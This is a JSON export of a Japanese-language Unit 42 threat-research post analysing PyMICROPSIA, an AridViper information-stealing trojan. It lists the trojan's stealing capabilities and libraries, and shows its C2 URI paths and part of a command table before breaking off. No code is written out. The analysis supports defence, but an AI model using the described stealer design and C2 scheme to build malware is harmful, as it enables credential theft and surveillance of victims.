{"id":110283,"date":"2020-12-16T17:07:47","date_gmt":"2020-12-17T01:07:47","guid":{"rendered":"https:\/\/unit42.paloaltonetworks.com\/?p=110283"},"modified":"2020-12-16T18:07:37","modified_gmt":"2020-12-17T02:07:37","slug":"pymicropsia","status":"publish","type":"post","link":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/pymicropsia\/","title":{"rendered":"PyMICROPSIA: AridViper\u304b\u3089\u306e\u65b0\u3057\u3044\u60c5\u5831\u7a83\u53d6\u30c8\u30ed\u30a4\u306e\u6728\u99ac"},"content":{"rendered":"<h2>\u6982\u8981<\/h2>\n<p>\u30d1\u30ed\u30a2\u30eb\u30c8\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30b9\u8105\u5a01\u30a4\u30f3\u30c6\u30ea\u30b8\u30a7\u30f3\u30b9\u30ea\u30b5\u30fc\u30c1\u30c1\u30fc\u30e0Unit 42\u306f\u3001\u4e2d\u6771\u5730\u57df\u3092\u6a19\u7684\u3068\u3059\u308b\u8105\u5a01\u30b0\u30eb\u30fc\u30d7AridViper\u3092\u8ffd\u8de1\u3057\u3066\u304d\u307e\u3057\u305f\u3002\u3053\u306e\u30ea\u30b5\u30fc\u30c1\u4e2d\u3001<a href=\"https:\/\/unit42.paloaltonetworks.com\/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia\/#:~:text=We%20named%20the%20second%20new,malicious%20updates%20a%20secure%20updates.\">MICROPSIA<\/a>\u30de\u30eb\u30a6\u30a7\u30a2\u30d5\u30a1\u30df\u30ea\u3068\u95a2\u9023\u3057\u3066\u3044\u308b\u65b0\u305f\u306a\u60c5\u5831\u7a83\u53d6\u578b\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u304c\u7279\u5b9a\u3055\u308c\u307e\u3057\u305f\u3002\u3053\u306e\u3053\u3068\u306f\u3001\u653b\u6483\u8005\u304c\u6d3b\u767a\u306a\u958b\u767a\u30d7\u30ed\u30d5\u30a1\u30a4\u30eb\u3092\u7dad\u6301\u3057\u3001\u6a19\u7684\u306e\u9632\u5fa1\u3092\u304b\u3044\u304f\u3050\u308d\u3046\u3068\u3059\u308b\u65b0\u3057\u3044\u30a4\u30f3\u30d7\u30e9\u30f3\u30c8\u3092\u4f5c\u6210\u3057\u3066\u3044\u308b\u3068\u3044\u3046\u3053\u3068\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u65b0\u3057\u3044\u30de\u30eb\u30a6\u30a7\u30a2\u30d5\u30a1\u30df\u30ea\u306fPython\u3067\u4f5c\u6210\u3055\u308c\u3066\u3044\u308b\u3053\u3068\u304b\u3089\u3001\u5f0a\u793e\u3067\u306f\u3053\u308c\u3092PyMICROPSIA\u3068\u540d\u4ed8\u3051\u307e\u3057\u305f\u3002<\/p>\n<p>\u4ee5\u4e0b\u306e\u56f31\u306f\u3001PyMICROPSIA\u30de\u30eb\u30a6\u30a7\u30a2\u30d5\u30a1\u30df\u30ea\u306e\u6a5f\u80fd\u306e\u6982\u8981\u3068\u4ee5\u524d\u306eAridViper\u306e\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3067\u89b3\u6e2c\u3055\u308c\u305f\u985e\u4f3c\u4e8b\u9805\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002PyMICROPSIA\u306e\u6a5f\u80fd\u306e\u8abf\u67fb\u4e2d\u306b\u3001\u653b\u6483\u8005\u306e\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u3067\u30db\u30b9\u30c8\u3055\u308c\u3066\u3044\u308b2\u3064\u306e\u30b5\u30f3\u30d7\u30eb\u3092\u65b0\u305f\u306b\u7279\u5b9a\u3057\u307e\u3057\u305f\u3002PyMICROPSIA\u306f\u305d\u306e\u30c7\u30d7\u30ed\u30a4\u4e2d\u306b\u3001\u3053\u308c\u3089\u306e\u30b5\u30f3\u30d7\u30eb\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3001\u4f7f\u7528\u3057\u307e\u3059\u3002\u3053\u306e2\u3064\u306e\u30b5\u30f3\u30d7\u30eb\u306f\u3001\u5f8c\u3067\u8ff0\u3079\u308b\u6c38\u7d9a\u5316\u3068\u30ad\u30fc\u30ed\u30ae\u30f3\u30b0\u306e\u6a5f\u80fd\u3092\u63d0\u4f9b\u3057\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_110158\" aria-describedby=\"caption-attachment-110158\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-110159 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/12\/word-image-182.png\" alt=\"PyMICROPSIA\u306e\u4e3b\u306a\u6a5f\u80fd\u3068\u3057\u3066\u306f\u3001\u30d5\u30a1\u30a4\u30eb\u306e\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u30c9\u30ed\u30c3\u30d7\u3068\u5b9f\u884c\u3001\u30d6\u30e9\u30a6\u30b6\u306e\u8a8d\u8a3c\u60c5\u5831\u7a83\u53d6\u3001\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8\u3001\u30ad\u30fc\u30ed\u30ae\u30f3\u30b0\u3001\u30ed\u30fc\u30ab\u30eb\u30de\u30b7\u30f3\u60c5\u5831\u306e\u53ce\u96c6\u3001\u30d5\u30a1\u30a4\u30eb\u306e\u7ba1\u7406\u3068\u6d41\u51fa\u3001Outlook\u60c5\u5831\u306e\u53ce\u96c6\u3001\u97f3\u58f0\u306e\u30ec\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u3001\u304a\u3088\u3073\u30b3\u30de\u30f3\u30c9\u306e\u5b9f\u884c\u304c\u3042\u308a\u307e\u3059\u3002 \" width=\"900\" height=\"719\" \/><figcaption id=\"caption-attachment-110158\" class=\"wp-caption-text\">\u56f31.PyMICROPSIA\u306e\u6982\u8981<\/figcaption><\/figure>\n<p>\u672c\u7a3f\u3067\u306f\u3001PyMICROPSIA\u306e\u6a5f\u80fd\u3068\u76ee\u7684\u3092\u8a73\u8ff0\u3057\u3001\u305d\u306e\u30b3\u30de\u30f3\u30c9 \u30a2\u30f3\u30c9 \u30b3\u30f3\u30c8\u30ed\u30fc\u30eb(C2)\u306e\u5b9f\u88c5\u3092\u5206\u6790\u3057\u307e\u3059\u3002\u307e\u305f\u3001\u4ee5\u524d\u306eAridViper\u306e\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u304cPyMICROPSIA\u306b\u8d77\u56e0\u3059\u308b\u3053\u3068\u3092\u793a\u5506\u3057\u305f\u4e3b\u306a\u89b3\u6e2c\u7d50\u679c\u3082\u53d6\u308a\u4e0a\u3052\u307e\u3059\u3002<\/p>\n<p>\u30d1\u30ed\u30a2\u30eb\u30c8\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30b9\u306e<a href=\"https:\/\/www.paloaltonetworks.jp\/network-security\/next-generation-firewall\">\u6b21\u4e16\u4ee3\u30d5\u30a1\u30a4\u30a2\u30a6\u30a9\u30fc\u30eb<\/a>\u3092\u3054\u4f7f\u7528\u306e\u304a\u5ba2\u69d8\u306f\u3001<a href=\"https:\/\/www.paloaltonetworks.jp\/products\/secure-the-network\/wildfire\">WildFire<\/a>\u3001<a href=\"https:\/\/www.paloaltonetworks.jp\/products\/threat-detection-and-prevention\/web-security\">URL\u30d5\u30a3\u30eb\u30bf\u30ea\u30f3\u30b0<\/a>\u3001\u304a\u3088\u3073<a href=\"https:\/\/www.paloaltonetworks.jp\/products\/threat-detection-and-prevention\/dns-security\">DNS Security<\/a>\u306e\u30b5\u30d6\u30b9\u30af\u30ea\u30d7\u30b7\u30e7\u30f3\u306b\u3088\u3063\u3066\u3001\u672c\u7a3f\u306b\u8a18\u8f09\u3055\u308c\u3066\u3044\u308b\u653b\u6483\u304b\u3089\u9632\u5fa1\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u307e\u305f\u3001<a href=\"https:\/\/www.paloaltonetworks.jp\/cortex\/autofocus\">AutoFocus<\/a>\u304a\u3088\u3073<a href=\"https:\/\/www.paloaltonetworks.jp\/cortex\/cortex-xdr\">Cortex XDR<\/a>\u306b\u3088\u3063\u3066\u3082\u9632\u5fa1\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<h2>PyMICROPSIA\u306e\u5206\u6790<\/h2>\n<p>PyMICROPSIA\u306b\u306f\u3001\u4ee5\u4e0b\u3092\u542b\u3080\u3055\u307e\u3056\u307e\u306a\u60c5\u5831\u7a83\u53d6\u304a\u3088\u3073\u30b3\u30f3\u30c8\u30ed\u30fc\u30eb\u306e\u6a5f\u80fd\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n<ul>\n<li>\u30d5\u30a1\u30a4\u30eb\u306e\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3002<\/li>\n<li>\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3068\u5b9f\u884c\u3002<\/li>\n<li>\u30d6\u30e9\u30a6\u30b6\u306e\u8a8d\u8a3c\u60c5\u5831\u306e\u7a83\u53d6\u3002\u30d6\u30e9\u30a6\u30b6\u5c65\u6b74\u304a\u3088\u3073\u30d7\u30ed\u30d5\u30a1\u30a4\u30eb\u306e\u30af\u30ea\u30a2\u3002<\/li>\n<li>\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8\u306e\u53d6\u5f97\u3002<\/li>\n<li>\u30ad\u30fc\u30ed\u30ae\u30f3\u30b0\u3002<\/li>\n<li>\u7a83\u53d6\u3057\u305f\u60c5\u5831\u3092RAR\u30d5\u30a1\u30a4\u30eb\u306b\u5727\u7e2e\u3002<\/li>\n<li>\u30d7\u30ed\u30bb\u30b9\u60c5\u5831\u306e\u53ce\u96c6\u3068\u30d7\u30ed\u30bb\u30b9\u306e\u5f37\u5236\u7d42\u4e86\u3002<\/li>\n<li>\u30d5\u30a1\u30a4\u30eb\u30ea\u30b9\u30c8\u60c5\u5831\u306e\u53ce\u96c6\u3002<\/li>\n<li>\u30d5\u30a1\u30a4\u30eb\u306e\u524a\u9664\u3002<\/li>\n<li>\u30de\u30b7\u30f3\u306e\u30ea\u30d6\u30fc\u30c8\u3002<\/li>\n<li>Outlook .ost\u30d5\u30a1\u30a4\u30eb\u306e\u53ce\u96c6\u3002Outlook\u30d7\u30ed\u30bb\u30b9\u306e\u5f37\u5236\u7d42\u4e86\u3068\u7121\u52b9\u5316\u3002<\/li>\n<li>\u30d5\u30a1\u30a4\u30eb\u3068\u30d5\u30a9\u30eb\u30c0\u306e\u524a\u9664\u3001\u4f5c\u6210\u3001\u5727\u7e2e\u3001\u304a\u3088\u3073\u6d41\u51fa\u3002<\/li>\n<li>\u30d5\u30a1\u30a4\u30eb\u306e\u6d41\u51fa\u306a\u3069\u3001USB\u30c9\u30e9\u30a4\u30d6\u304b\u3089\u306e\u60c5\u5831\u306e\u53ce\u96c6\u3002<\/li>\n<li>\u97f3\u58f0\u30ec\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u3002<\/li>\n<li>\u30b3\u30de\u30f3\u30c9\u306e\u5b9f\u884c\u3002<\/li>\n<\/ul>\n<h4><strong>\u5b9f\u88c5\u306e\u6982\u8981<\/strong><\/h4>\n<p>PyMICROPSIA\u306f\u3001Python\u3067\u4f5c\u6210\u3055\u308c\u3001<a href=\"https:\/\/www.pyinstaller.org\/\">PyInstaller<\/a>\u3092\u4f7f\u7528\u3057\u3066Windows\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u5316\u3057\u305f\u60c5\u5831\u7a83\u53d6\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u3067\u3059\u3002<\/p>\n<figure id=\"attachment_110160\" aria-describedby=\"caption-attachment-110160\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-110161 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/12\/word-image-183.png\" alt=\"PyMICROPSIA\u306f\u3001Python\u3067\u4f5c\u6210\u3055\u308c\u305f\u60c5\u5831\u7a83\u53d6\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u3067\u3042\u308a\u3001PyInstaller\u3092\u4f7f\u7528\u3057\u3066Windows\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u5316\u3055\u308c\u3066\u3044\u307e\u3059\u3002 \" width=\"900\" height=\"520\" \/><figcaption id=\"caption-attachment-110160\" class=\"wp-caption-text\">\u56f32.PyMICROPSIA\u5185\u306ePyInstaller\u6587\u5b57\u5217<\/figcaption><\/figure>\n<p>\u305d\u306e\u4e3b\u306a\u6a5f\u80fd\u306f\u3001\u3055\u307e\u3056\u307e\u306a\u30b9\u30ec\u30c3\u30c9\u3092\u521d\u671f\u5316\u3057\u3066\u8907\u6570\u306e\u30bf\u30b9\u30af\u3092\u5b9a\u671f\u7684\u306b\u547c\u3073\u51fa\u3059\u30eb\u30fc\u30d7\u3092\u5b9f\u884c\u3059\u308b\u3053\u3068\u3067\u5b9f\u88c5\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u305d\u306e\u76ee\u7684\u306f\u3001\u60c5\u5831\u306e\u53ce\u96c6\u3068C2\u30aa\u30da\u30ec\u30fc\u30bf\u3068\u306e\u3084\u308a\u53d6\u308a\u3067\u3059\u3002<\/p>\n<figure id=\"attachment_110162\" aria-describedby=\"caption-attachment-110162\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-110163 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/12\/word-image-184.png\" alt=\"PyMICROPSIA\u306e\u4e3b\u306a\u6a5f\u80fd\u306f\u3001\u3053\u3053\u306b\u793a\u3059\u3088\u3046\u306b\u3001\u3055\u307e\u3056\u307e\u306a\u30b9\u30ec\u30c3\u30c9\u3092\u521d\u671f\u5316\u3057\u3066\u8907\u6570\u306e\u30bf\u30b9\u30af\u3092\u5b9a\u671f\u7684\u306b\u547c\u3073\u51fa\u3059\u30eb\u30fc\u30d7\u3092\u5b9f\u884c\u3059\u308b\u3053\u3068\u3067\u5b9f\u88c5\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u305d\u306e\u76ee\u7684\u306f\u3001\u60c5\u5831\u306e\u53ce\u96c6\u3068C2\u30aa\u30da\u30ec\u30fc\u30bf\u3068\u306e\u3084\u308a\u53d6\u308a\u3067\u3059\u3002 \" width=\"900\" height=\"1348\" \/><figcaption id=\"caption-attachment-110162\" class=\"wp-caption-text\">\u56f33.\u30e1\u30a4\u30f3 \u30b3\u30fc\u30c9 \u30eb\u30fc\u30d7<\/figcaption><\/figure>\n<p>\u653b\u6483\u8005\u306f\u3001\u7d44\u307f\u8fbc\u307fPython\u30e9\u30a4\u30d6\u30e9\u30ea\u3068\u7279\u5b9a\u306e\u30d1\u30c3\u30b1\u30fc\u30b8\u306e\u4e21\u65b9\u3092\u542b\u3080\u8907\u6570\u306e\u8208\u5473\u6df1\u3044Python\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u5229\u7528\u3057\u3066\u305d\u306e\u76ee\u7684\u3092\u9054\u6210\u3057\u3066\u3044\u307e\u3059\u3002\u4ee5\u4e0b\u306f\u3001\u60c5\u5831\u7a83\u53d6\u56fa\u6709\u306e\u30e9\u30a4\u30d6\u30e9\u30ea\u306e\u4f8b\u3067\u3059\u3002<\/p>\n<ul>\n<li><a href=\"https:\/\/pypi.org\/project\/PyAudio\/\">PyAudio<\/a>: \u60c5\u5831\u7a83\u53d6\u6a5f\u80fd\u7528\u3002<\/li>\n<li><a href=\"https:\/\/pypi.org\/project\/mss\/\">mss<\/a>: \u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8\u6a5f\u80fd\u7528\u3002<\/li>\n<\/ul>\n<figure id=\"attachment_110164\" aria-describedby=\"caption-attachment-110164\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-110165 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/12\/word-image-185.png\" alt=\"PyMICROPSIA\u306f\u3001\u3053\u3053\u306b\u793a\u3059\u3088\u3046\u306b\u3001\u97f3\u58f0\u7a83\u53d6\u6a5f\u80fd\u7528\u306bPyAudio\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002 \" width=\"900\" height=\"371\" \/><figcaption id=\"caption-attachment-110164\" class=\"wp-caption-text\">\u56f34.\u97f3\u58f0\u30ec\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u7528PyAudio\u30e9\u30a4\u30d6\u30e9\u30ea<\/figcaption><\/figure>\n<figure id=\"attachment_110166\" aria-describedby=\"caption-attachment-110166\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-110167 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/12\/word-image-186.png\" alt=\"PyMICROPSIA\u306f\u3001\u3053\u3053\u306b\u793a\u3059\u3088\u3046\u306b\u3001\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8\u53d6\u5f97\u7528\u306bmss\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002 \" width=\"900\" height=\"508\" \/><figcaption id=\"caption-attachment-110166\" class=\"wp-caption-text\">\u56f35.\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8\u7528mss\u30e9\u30a4\u30d6\u30e9\u30ea<\/figcaption><\/figure>\n<p>Windows<a href=\"https:\/\/docs.python.org\/3\/library\/subprocess.html\">\u30d7\u30ed\u30bb\u30b9<\/a>\u3001<a href=\"https:\/\/docs.python.org\/3\/library\/winreg.html\">Windows\u30ec\u30b8\u30b9\u30c8\u30ea<\/a>\u3001\u30cd\u30c3\u30c8\u30ef\u30fc\u30ad\u30f3\u30b0\u3001\u30d5\u30a1\u30a4\u30eb\u30b7\u30b9\u30c6\u30e0\u306e\u64cd\u4f5c\u306a\u3069\u8907\u6570\u306e\u76ee\u7684\u3067\u3001Python\u7d44\u307f\u8fbc\u307f\u30e9\u30a4\u30d6\u30e9\u30ea\u306e\u4f7f\u7528\u304c\u60f3\u5b9a\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_110168\" aria-describedby=\"caption-attachment-110168\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-110169 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/12\/word-image-187.png\" alt=\"\u3053\u3053\u306b\u793a\u3059\u3088\u3046\u306b\u3001Windows\u30ec\u30b8\u30b9\u30c8\u30ea\u306e\u64cd\u4f5c\u306e\u305f\u3081\u306b\u3001Python\u7d44\u307f\u8fbc\u307f\u30e9\u30a4\u30d6\u30e9\u30ea\u306e\u4f7f\u7528\u304c\u60f3\u5b9a\u3055\u308c\u3066\u3044\u307e\u3059\u3002 \" width=\"900\" height=\"483\" \/><figcaption id=\"caption-attachment-110168\" class=\"wp-caption-text\">\u56f36.Windows\u30ec\u30b8\u30b9\u30c8\u30ea\u306e\u64cd\u4f5c<\/figcaption><\/figure>\n<figure id=\"attachment_110170\" aria-describedby=\"caption-attachment-110170\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-110171 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/12\/word-image-188.png\" alt=\"\u3053\u3053\u306b\u793a\u3059\u3088\u3046\u306b\u3001Windows\u30d7\u30ed\u30bb\u30b9\u306e\u64cd\u4f5c\u306e\u305f\u3081\u306b\u3001Python\u7d44\u307f\u8fbc\u307f\u30e9\u30a4\u30d6\u30e9\u30ea\u306e\u4f7f\u7528\u304c\u60f3\u5b9a\u3055\u308c\u3066\u3044\u307e\u3059\u3002 \" width=\"900\" height=\"139\" \/><figcaption id=\"caption-attachment-110170\" class=\"wp-caption-text\">\u56f37.Windows\u30d7\u30ed\u30bb\u30b9\u306e\u64cd\u4f5c<\/figcaption><\/figure>\n<p>Windows\u30aa\u30da\u30ec\u30fc\u30c6\u30a3\u30f3\u30b0\u30b7\u30b9\u30c6\u30e0\u306e\u305d\u306e\u4ed6\u306e\u7279\u5b9a\u306e\u64cd\u4f5c\u306b\u3064\u3044\u3066\u306f\u3001\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u30e9\u30a4\u30d6\u30e9\u30ea\u304c\u4f7f\u7528\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<ul>\n<li><a href=\"https:\/\/pypi.org\/project\/WMI\/\">WMI<\/a>: Windows Management Instrumentation\u306e\u64cd\u4f5c\u7528\u3002<\/li>\n<li><a href=\"https:\/\/timgolden.me.uk\/pywin32-docs\/win32security.html\">win32security<\/a>\u304a\u3088\u3073<a href=\"https:\/\/github.com\/saltstack\/salt-windows-install\/blob\/master\/deps\/salt\/python\/App\/Lib\/site-packages\/win32\/lib\/ntsecuritycon.py\">ntsecuritycon<\/a>: win32security API\u306e\u64cd\u4f5c\u7528\u3002<\/li>\n<\/ul>\n<figure id=\"attachment_110172\" aria-describedby=\"caption-attachment-110172\" style=\"width: 894px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-110173 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/12\/word-image-189.png\" alt=\"PyMICROPSIA\u306f\u3001Windows Management Instrumentation\u306e\u64cd\u4f5c\u306e\u305f\u3081\u306bWMI\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u5229\u7528\u3057\u307e\u3059\u3002\" width=\"894\" height=\"586\" \/><figcaption id=\"caption-attachment-110172\" class=\"wp-caption-text\">\u56f38.USB\u306e\u64cd\u4f5c\u306e\u305f\u3081\u306eWMI\u306e\u4f7f\u7528<\/figcaption><\/figure>\n<figure id=\"attachment_110174\" aria-describedby=\"caption-attachment-110174\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-110175 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/12\/word-image-190.png\" alt=\"PyMICROPSIA\u306f\u3001win32security API\u306e\u64cd\u4f5c\u306e\u305f\u3081\u306bwin32security\u304a\u3088\u3073ntsecuritycon\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u5229\u7528\u3057\u307e\u3059\u3002 \" width=\"900\" height=\"346\" \/><figcaption id=\"caption-attachment-110174\" class=\"wp-caption-text\">\u56f39. win32security\u3068ntsecuritycon\u306e\u4f7f\u7528<\/figcaption><\/figure>\n<p>PyMICROPSIA\u306e\u30b3\u30fc\u30c9\u3068\u6a5f\u80fd\u306e\u8a73\u7d30\u306a\u5206\u6790\u306b\u3064\u3044\u3066\u306f\u3001\u300c\u53c2\u8003\u60c5\u5831\u300d\u3092\u53c2\u7167\u3057\u3066\u304f\u3060\u3055\u3044\u3002<\/p>\n<h4><strong>\u30b3\u30de\u30f3\u30c9&amp;\u30b3\u30f3\u30c8\u30ed\u30fc\u30eb<\/strong><\/h4>\n<p>PyMICROPSIA\u306f\u3001\u5358\u7d14\u306aHTTP POST\u30d9\u30fc\u30b9\u306eC2\u30d7\u30ed\u30c8\u30b3\u30eb\u3092\u5b9f\u88c5\u3057\u3001\u547c\u3073\u51fa\u3059\u6a5f\u80fd\u306b\u5fdc\u3058\u3066\u901a\u4fe1\u4e2d\u306b\u3055\u307e\u3056\u307e\u306auniform resource identifier (\u30e6\u30cb\u30d5\u30a9\u30fc\u30e0\u30ea\u30bd\u30fc\u30b9\u8b58\u5225\u5b50 - URI)\u30d1\u30b9\u304a\u3088\u3073\u5909\u6570\u3092\u4f7f\u7528\u3057\u307e\u3059(\u5b9f\u88c5\u306e\u8a73\u7d30\u306b\u3064\u3044\u3066\u306f\u3001\u300c\u53c2\u8003\u60c5\u5831\u300d\u3092\u53c2\u7167\u3057\u3066\u304f\u3060\u3055\u3044)\u3002<\/p>\n<p>\u6b21\u306e\u8868\u306f\u3001PyMICROPSIA\u306b\u304a\u3051\u308bURI\u30d1\u30b9\u3068\u5bfe\u5fdc\u3059\u308b\u6a5f\u80fd\u306e\u6982\u8981\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<table style=\"width: 101.717%;\">\n<tbody>\n<tr>\n<td style=\"width: 53.1111%;\"><strong>\u30d1\u30b9<\/strong><\/td>\n<td style=\"width: 306.889%;\"><strong>\u30e1\u30bd\u30c3\u30c9<\/strong><\/td>\n<\/tr>\n<tr>\n<td style=\"width: 53.1111%;\">\/zoailloaze\/sfuxmiibif\/samantha<\/td>\n<td style=\"width: 306.889%;\">\u8981\u6c42\u306e\u524a\u9664\u3002\u767b\u9332\u89e3\u9664\u3002<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 53.1111%;\">\/zoailloaze\/sfuxmiibif\/lashawna<\/td>\n<td style=\"width: 306.889%;\">\u30c7\u30d0\u30a4\u30b9\u306e\u767b\u9332\u3002<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 53.1111%;\">\/zoailloaze\/sfuxmiibif\/matheny<\/td>\n<td style=\"width: 306.889%;\">\u30b3\u30de\u30f3\u30c9\u51fa\u529b\u30c7\u30fc\u30bf\u306e\u9001\u4fe1\u3002<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 53.1111%;\">\/zoailloaze\/sfuxmiibif\/uiasfvz<\/td>\n<td style=\"width: 306.889%;\">USB\u30c7\u30d0\u30a4\u30b9\u60c5\u5831<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 53.1111%;\">\/zoailloaze\/sfuxmiibif\/daryl<\/td>\n<td style=\"width: 306.889%;\">\u8981\u6c42\u306e\u524a\u9664\u3002<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 53.1111%;\">\/zoailloaze\/sfuxmiibif\/qprbudls<\/td>\n<td style=\"width: 306.889%;\">\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3002<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 53.1111%;\">\/zoailloaze\/sfuxmiibif\/nyrvoz<\/td>\n<td style=\"width: 306.889%;\">\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9URL\u3002<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 53.1111%;\">\/zoailloaze\/sfuxmiibif\/hortense1<\/td>\n<td style=\"width: 306.889%;\">\u30d5\u30a1\u30a4\u30eb\u306e\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3002<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p style=\"text-align: center;\"><a id=\"post-110155-_an27zc1919zt\"><\/a><span style=\"font-size: 12pt;\"><sup><em><span style=\"color: #999999;\">\u88681 \u8a2d\u5b9a\u30d5\u30a9\u30eb\u30c0\u304a\u3088\u3073\u30d5\u30a1\u30a4\u30eb\u306e\u4e3b\u306a\u76ee\u7684<\/span> <\/em><\/sup><\/span><\/p>\n<p>\u540c\u3058\u304f\u91cd\u8981\u306a\u70b9\u306f\u3001\u5206\u6790\u3057\u305fPyMICROPSIA\u30b5\u30f3\u30d7\u30eb\u306b\u306f\u3001C2\u95a2\u9023\u30b3\u30fc\u30c9\u3067\u3001\u5fdc\u7b54\u306e\u51e6\u7406\u6642\u306b\u5b9f\u884c\u3055\u308c\u306a\u3044\u30b3\u30fc\u30c9\u5206\u5c90\u304c\u8907\u6570\u3042\u308b\u3053\u3068\u3067\u3059\u3002\u3053\u308c\u306f\u3001\u653b\u6483\u8005\u304c\u4f9d\u7136\u3068\u3057\u3066\u30a2\u30af\u30c6\u30a3\u30d6\u306b\u3053\u306e\u30b3\u30fc\u30c9\u306b\u53d6\u308a\u7d44\u3093\u3067\u3044\u308b\u53ef\u80fd\u6027\u3092\u793a\u5506\u3057\u3066\u3044\u307e\u3059\u3002\u6b21\u306e\u8868\u306b\u3001\u5230\u9054\u53ef\u80fd\u306a\u30b3\u30fc\u30c9\u30bb\u30af\u30b7\u30e7\u30f3\u306b\u57fa\u3065\u3044\u3066\u3001\u6a19\u7684\u306e\u30de\u30b7\u30f3\u3067\u5b9f\u884c\u3055\u308c\u308b\u30b3\u30de\u30f3\u30c9\u3068\u30a2\u30af\u30b7\u30e7\u30f3\u306e\u6982\u8981\u3092\u793a\u3057\u307e\u3059\u3002<\/p>\n<table style=\"width: 100.762%;\">\n<tbody>\n<tr>\n<td style=\"width: 14.73%;\"><strong>\u30b3\u30de\u30f3\u30c9<\/strong><\/td>\n<td style=\"width: 251.555%;\"><strong>\u30a2\u30af\u30b7\u30e7\u30f3<\/strong><\/td>\n<\/tr>\n<tr>\n<td style=\"width: 14.73%;\">Lee<\/td>\n<td style=\"width: 251.555%;\">\u65b0\u3057\u3044\u30c7\u30d0\u30a4\u30b9\u306e\u767b\u9332\u3002<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 14.73%;\">Renee<\/td>\n<td style=\"width: 251.555%;\">\u30c7\u30d0\u30a4\u30b9\u306e\u524a\u9664\u3002<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 14.73%;\">Rapunzel<\/td>\n<td style=\"width: 